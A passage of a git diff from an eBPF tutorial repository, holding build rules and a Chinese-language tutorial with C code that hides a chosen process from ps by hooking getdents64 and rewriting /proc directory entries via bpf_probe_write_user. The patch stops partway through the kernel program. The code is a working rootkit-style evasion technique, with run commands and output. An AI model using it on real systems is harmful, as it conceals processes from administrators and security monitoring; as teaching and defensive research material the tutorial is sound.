$(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/24-hide/common.h b/24-hide/common.h new file mode 100644 index 0000000..ac4be7f --- /dev/null +++ b/24-hide/common.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/24-hide/index.html b/24-hide/index.html new file mode 100644 index 0000000..e9d9667 --- /dev/null +++ b/24-hide/index.html @@ -0,0 +1,560 @@ + + + + + + 使用 eBPF 隐藏进程或文件信息 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    eBPF 开发实践:使用 eBPF 隐藏进程或文件信息

    +

    eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。

    +

    在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。

    +

    背景知识与实现机制

    +

    "进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。ps 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 ps 命令等检测手段“隐身”。

    +

    要实现进程隐藏,关键在于操作 /proc/ 目录。在 Linux 中,getdents64 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 bpf_probe_write_user 功能,它可以修改用户空间的内存,因此能用来修改 getdents64 返回的结果。

    +

    下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。

    +

    内核态 eBPF 程序实现

    +

    接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分:

    +
    // SPDX-License-Identifier: BSD-3-Clause
    +#include "vmlinux.h"
    +#include <bpf/bpf_helpers.h>
    +#include <bpf/bpf_tracing.h>
    +#include <bpf/bpf_core_read.h>
    +#include "common.h"
    +
    +char LICENSE[] SEC("license") = "Dual BSD/GPL";
    +
    +// Ringbuffer Map to pass messages from kernel to user
    +struct {
    +    __uint(type, BPF_MAP_TYPE_RINGBUF);
    +    __uint(max_entries, 256 * 1024);
    +} rb SEC(".maps");
    +
    +// Map to fold the dents buffer addresses
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, long unsigned int);
    +} map_buffs SEC(".maps");
    +
    +// Map used to enable searching through the
    +// data in a loop
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, int);
    +} map_bytes_read SEC(".maps");
    +
    +// Map with address of actual
    +struct {
    +    __uint(type, BPF_MAP_TYPE_HASH);
    +    __uint(max_entries, 8192);
    +    __type(key, size_t);
    +    __type(value, long unsigned int);
    +} map_to_patch SEC(".maps");
    +
    +// Map to hold program tail calls
    +struct {
    +    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
    +    __uint(max_entries, 5);
    +    __type(key, __u32);
    +    __type(value, __u32);
    +} map_prog_array SEC(".maps");
    +
    +

    我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。

    +
      +
    • "vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。
    • +
    • "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。
    • +
    • "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。
    • +
    • "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。
    • +
    +

    程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。

    +

    其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。

    +

    "map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。

    +

    "map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。

    +

    "map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。

    +

    "map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。

    +

    程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。

    +

    接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。

    +
    
    +// Optional Target Parent PID
    +const volatile int target_ppid = 0;
    +
    +// These store the string represenation
    +// of the PID to hide. This becomes the name
    +// of the folder in /proc/
    +const volatile int pid_to_hide_len = 0;
    +const volatile char pid_to_hide[max_pid_len];
    +
    +// struct linux_dirent64 {
    +//     u64        d_ino;    /* 64-bit inode number */
    +//     u64        d_off;    /* 64-bit offset to next structure */
    +//     unsigned short d_reclen; /* Size of this dirent */
    +//     unsigned char  d_type;   /* File type */
    +//     char           d_name[]; /* Filename (null-terminated) */ }; 
    +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
    +SEC("tp/syscalls/sys_enter_getdents64")
    +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
    +{
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    // Check if we're a process thread of interest
    +    // if target_ppid is 0 then we target all pids
    +    if (target_ppid != 0) {
    +        struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    +        int ppid = BPF_CORE_READ(task, real_parent, tgid);
    +        if (ppid != target_ppid) {
    +            return 0;
    +        }
    +    }
    +    int pid = pid_tgid >> 32;
    +    unsigned int fd = ctx->args[0];
    +    unsigned int buff_count = ctx->args[2];
    +
    +    // Store params in map for exit function
    +    struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1];
    +    bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY);
    +
    +    return 0;
    +}
    +
    +

    在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 getdents64 系统调用的入口处进行处理。

    +

    我们首先声明了几个全局的变量。其中 target_ppid 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。pid_to_hide_lenpid_to_hide 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 /proc/ 目录下的一个文件夹的名称,因此被隐藏的进程在 /proc/ 目录下将无法被看到。

    +

    接下来,我们声明了一个名为 linux_dirent64 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。

    +

    然后是 getdents64 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。

    +

    随后的部分是 eBPF 程序的具体实现。我们在 getdents64 系统调用的入口处定义了一个名为 handle_getdents_enter 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 target_ppid,那么我们就只关注那些父进程的 PID 为 target_ppid 的进程。如果 target_ppid 为 0,我们就关注所有进程。

    +

    在确认了当前进程是我们关注的进程之后,我们将 getdents64 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 getdents64 系统调用的第二个参数,它是一个指向 linux_dirent64 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 map_buffs 这个 map 中。

    +

    至此,我们完成了 getdents64 系统调用入口处的处理。在系统调用返回时,我们将会在 handle_getdents_exit 函数中,对目录项进行修改,以实现进程隐藏。

    +

    在接下来的代码段中,我们将要实现在 getdents64 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。

    +

    我们首先定义了一个名为 handle_getdents_exit 的函数,它将在 getdents64 系统调用返回时被调用。

    +
    
    +SEC("tp/syscalls/sys_exit_getdents64")
    +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
    +{
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    int total_bytes_read = ctx->ret;
    +    // if bytes_read is 0, everything's been read
    +    if (total_bytes_read <= 0) {
    +        return 0;
    +    }
    +
    +    // Check we stored the address of the buffer from the syscall entry
    +    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
    +    if (pbuff_addr == 0) {
    +        return 0;
    +    }
    +
    +    // All of this is quite complex, but basically boils down to
    +    // Calling 'handle_getdents_exit' in a loop to iterate over the file listing
    +    // in chunks of 200, and seeing if a folder with the name of our pid is in there.
    +    // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
    +    // patching
    +    long unsigned int buff_addr = *pbuff_addr;
    +    struct linux_dirent64 *dirp = 0;
    +    int pid = pid_tgid >> 32;
    +    short unsigned int d_reclen = 0;
    +    char filename[max_pid_len];
    +
    +    unsigned int bpos = 0;
    +    unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
    +    if (pBPOS != 0) {
    +        bpos = *pBPOS;
    +    }
    +
    +    for (int i = 0; i < 200; i ++) {
    +        if (bpos >= total_bytes_read) {
    +            break;
    +        }
    +        dirp = (struct linux_dirent64 *)(buff_addr+bpos);
    +        bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
    +        bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
    +
    +        int j = 0;
    +        for (j = 0; j < pid_to_hide_len; j++) {
    +            if (filename[j] != pid_to_hide[j]) {
    +                break;
    +            }
    +        }
    +        if (j == pid_to_hide_len) {
    +            // ***********
    +            // We've found the folder!!!
    +            // Jump to handle_getdents_patch so we can remove it!
    +            // ***********
    +            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    +            bpf_map_delete_elem(&map_buffs, &pid_tgid);
    +            bpf_tail_call(ctx, &map_prog_array, PROG_02);
    +        }
    +        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);
    +        bpos += d_reclen;
    +    }
    +
    +    // If we didn't find it, but there's still more to read,
    +    // jump back the start of this function and keep looking
    +    if (bpos < total_bytes_read) {
    +        bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
    +        bpf_tail_call(ctx, &map_prog_array, PROG_01);
    +    }
    +    bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    +    bpf_map_delete_elem(&map_buffs, &pid_tgid);
    +
    +    return 0;
    +}
    +
    +
    +

    在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。

    +

    然后我们从 map_buffs 这个 map 中获取 getdents64 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。

    +

    接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 bpf_tail_call 函数跳转到 handle_getdents_patch 函数,进行实际的隐藏操作。

    +
    SEC("tp/syscalls/sys_exit_getdents64")
    +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
    +{
    +    // Only patch if we've already checked and found our pid's folder to hide
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
    +    if (pbuff_addr == 0) {
    +        return 0;
    +    }
    +
    +    // Unlink target, by reading in previous linux_dirent64 struct,
    +    // and setting it's d_reclen to cover itself and our target.
    +    // This will make the program skip over our folder.
    +    long unsigned int buff_addr = *pbuff_addr;
    +    struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
    +    short unsigned int d_reclen_previous = 0;
    +    bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);
    +
    +    struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous);
    +    short unsigned int d_reclen = 0;
    +    bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
    +
    +    // Debug print
    +    char filename[max_pid_len];
    +    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
    +    filename[pid_to_hide_len-1] = 0x00;
    +    bpf_printk("[PID_HIDE] filename previous %s\n", filename);
    +    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
    +    filename[pid_to_hide_len-1] = 0x00;
    +    bpf_printk("[PID_HIDE] filename next one %s\n", filename);
    +
    +    // Attempt to overwrite
    +    short unsigned int d_reclen_new = d_reclen_previous + d_reclen;
    +    long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
    +
    +    // Send an event
    +    struct event *e;
    +    e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    +    if (e) {
    +        e->success = (ret == 0);
    +        e->pid = (pid_tgid >> 32);
    +        bpf_get_current_comm(&e->comm, sizeof(e->comm));
    +        bpf_ringbuf_submit(e, 0);
    +    }
    +
    +    bpf_map_delete_elem(&map_to_patch, &pid_tgid);
    +    return 0;
    +}
    +
    +
    +

    handle_getdents_patch 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 d_reclen 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。

    +

    在这个过程中,我们用到了 bpf_probe_read_userbpf_probe_read_user_strbpf_probe_write_user 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。

    +

    在我们完成隐藏操作后,我们会向一个名为 rb 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 bpf_ringbuf_reserve 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 bpf_ringbuf_submit 函数将事件提交到缓冲区。

    +

    最后,我们清理了之前保存在 map 中的数据,并返回。

    +

    这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。

    +

    用户态 eBPF 程序实现

    +

    我们在用户态的 eBPF 程序中主要进行了以下几个操作:

    +
      +
    1. 打开 eBPF 程序。
    2. +
    3. 设置我们想要隐藏的进程的 PID。
    4. +
    5. 验证并加载 eBPF 程序。
    6. +
    7. 等待并处理由 eBPF 程序发送的事件。
    8. +
    +

    首先,我们打开了 eBPF 程序。这个过程是通过调用 pidhide_bpf__open 函数实现的。如果这个过程失败了,我们就直接返回。

    +
        skel = pidhide_bpf__open();
    +    if (!skel)
    +    {
    +        fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
    +        return 1;
    +    }
    +
    +

    接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 rodata 区域实现的。默认情况下,我们隐藏的是当前进程。

    +
        char pid_to_hide[10];
    +    if (env.pid_to_hide == 0)
    +    {
    +        env.pid_to_hide = getpid();
    +    }
    +    sprintf(pid_to_hide, "%d", env.pid_to_hide);
    +    strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
    +    skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1;
    +    skel->rodata->target_ppid = env.target_ppid;
    +
    +

    然后,我们验证并加载 eBPF 程序。这个过程是通过调用 pidhide_bpf__load 函数实现的。如果这个过程失败了,我们就进行清理操作。

    +
        err = pidhide_bpf__load(skel);
    +    if (err)
    +    {
    +        fprintf(stderr, "Failed to load and verify BPF skeleton\n");
    +        goto cleanup;
    +    }
    +
    +

    最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 ring_buffer__poll 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 handle_event 函数来处理这个事件。

    +
    printf("Successfully started!\n");
    +printf("Hiding PID %d\n", env.pid_to_hide);
    +while (!exiting)
    +{
    +    err = ring_buffer__poll(rb, 100 /* timeout, ms */);
    +    /* Ctrl-C will cause -EINTR */
    +    if (err == -EINTR)
    +    {
    +        err = 0;
    +        break;
    +    }
    +    if (err < 0)
    +    {
    +        printf("Error polling perf buffer: %d\n", err);
    +        break;
    +    }
    +}
    +
    +

    handle_event 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 event 结构体,然后根据 success 字段判断这个事件是否表示成功隐藏了一个进程,最后打

    +

    印相应的消息。

    +
    static int handle_event(void *ctx, void *data, size_t data_sz)
    +{
    +    const struct event *e = data;
    +    if (e->success)
    +        printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
    +    else
    +        printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
    +    return 0;
    +}
    +
    +

    这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。

    +

    完整源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide

    +
    +

    本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。

    +
    +

    编译运行,隐藏 PID

    +

    首先,我们需要编译 eBPF 程序:

    +
    make
    +
    +

    然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令:

    +
    sudo ./pidhide --pid-to-hide 1534
    +
    +

    这条命令将使所有尝试读取 /proc/ 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏:

    +
    $ ps -aux | grep 1534
    +yunwei      1534  0.0  0.0 244540  6848 ?        Ssl  6月02   0:00 /usr/libexec/gvfs-mtp-volume-monitor
    +yunwei     32065  0.0  0.0  17712  2580 pts/1    S+   05:43   0:00 grep --color=auto 1534
    +
    +

    此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 sudo ./pidhide --pid-to-hide 1534,再次运行 ps -aux | grep 1534,就会发现进程 ID 为 1534 的进程已经不见了。

    +
    $ sudo ./pidhide --pid-to-hide 1534
    +Hiding PID 1534
    +Hid PID from program 31529 (ps)
    +Hid PID from program 31551 (ps)
    +Hid PID from program 31560 (ps)
    +Hid PID from program 31582 (ps)
    +Hid PID from program 31582 (ps)
    +Hid PID from program 31585 (bash)
    +Hid PID from program 31585 (bash)
    +Hid PID from program 31609 (bash)
    +Hid PID from program 31640 (ps)
    +Hid PID from program 31649 (ps)
    +
    +

    这个程序将匹配这个 pid 的进程隐藏,使得像 ps 这样的工具无法看到,我们可以通过 ps aux | grep 1534 来验证。

    +
    $ ps -aux | grep 1534
    +root       31523  0.1  0.0  22004  5616 pts/2    S+   05:42   0:00 sudo ./pidhide -p 1534
    +root       31524  0.0  0.0  22004   812 pts/3    Ss   05:42   0:00 sudo ./pidhide -p 1534
    +root       31525  0.3  0.0   3808  2456 pts/3    S+   05:42   0:00 ./pidhide -p 1534
    +yunwei     31583  0.0  0.0  17712  2612 pts/1    S+   05:42   0:00 grep --color=auto 1534
    +
    +

    总结

    +

    通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。

    +

    您还可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

    +

    接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,包括如何使用 eBPF 进行网络和系统性能分析,如何编写更复杂的 eBPF 程序以及如何将 eBPF 集成到您的应用中。希望你会在我们的教程中找到有用的信息,进一步提升你的 eBPF 开发技能。

    + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/24-hide/pidhide.bpf.c b/24-hide/pidhide.bpf.c new file mode 100644 index 0000000..47f8895 --- /dev/null +++ b/24-hide/pidhide.bpf.c @@ -0,0 +1,208 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string represenation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[max_pid_len]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 